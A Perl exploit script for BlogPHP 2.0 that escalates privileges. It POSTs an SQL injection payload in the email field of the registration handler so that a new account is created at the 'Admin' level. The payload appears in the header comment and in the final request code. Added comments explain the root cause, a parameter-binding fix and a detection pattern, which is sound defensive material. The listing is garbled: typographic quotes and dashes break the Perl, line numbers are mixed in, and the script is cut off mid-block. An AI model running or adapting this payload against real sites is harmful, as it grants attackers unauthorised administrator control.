1 #!/usr/bin/perl
2 # BlogPHP 2.0 Remote Privilege Escalation Exploit
3 # Author : Cod3rZ
4 # Site : http://cod3rz.helloweb.eu
5 # Site : http://devilsnight.altervista.org
6 # Cuz We Back Rude This Time
7 #
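8 # Privilege Escalation
# Root cause, as far as the request below shows: the email field of the
# act=register2 handler appears to be concatenated unescaped into an SQL INSERT,
# so the quoted values appended after the address land in later columns,
# including the one that holds the account level.
# Fix: bind every registration field as a query parameter and assign the account
# level server-side. Detection: register2 POSTs whose email value contains
# quotes, commas or a comment opener.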
9 # Send a request to http://127.0.0.1/BlogPHPv2/index.php?act=register2 with:
10 # username=[yourusername]&password=[yourpass]&email=[yourmail]’,’Admin’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’)/*
11 #
12 # There are other bugs, find them yourself
13 #
14 # Usage: perl bp.pl <site> <user> <pass> <mail>
15
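# Clear the terminal before the banner is printed. The listing hard-coded the
# Windows command and kept the Unix one commented out, so the call fails on any
# other platform. Choose the command from the running OS instead.
system($^O eq 'MSWin32' ? 'cls' : 'clear');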
18
19 use LWP::UserAgent;
20 use HTTP::Request::Common;
21
# Positional command-line arguments, in the order the usage line gives them:
# <site> <user> <pass> <mail>. Any that are missing stay undef.
($site, $user, $pass, $mail) = @ARGV;
26
# Startup banner: title, author credit and site, framed by two rule lines.
{
    my $rule = " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
    print $rule,
        " BlogPHP 2.0 Remote Privilege Escalation Exploit \n",
        " Powered by Cod3rZ \n",
        " http://cod3rz.helloweb.eu \n",
        $rule;
}
32
# Print the command-line synopsis followed by a closing rule line.
# Takes no arguments; returns whatever print returns.
sub usage {
    print " Usage: perl bp.pl <site> <user> <pass> <mail> \n"
        . " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
}
37 if(!$mail) { &usage; }
38 else {
39
if ($site !~ /http:\/\//) { $site = "http://".$site; }
40
41
print " Site: $site \n";
42
print " User: $user \n";
43
print " Pass: $pass \n";
44
print " Mail: $mail \n";
45
print " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
46
print " Please Wait \n";
47
print " −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\n";
48
49
$ua = LWP::UserAgent−>new;
50
$lwp = $ua−>request(POST $site.’index.php?act=register2’,
51
[ username => $user, password => $pass, email => $mail."’,’Admin’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’,’’)/*" ]);
52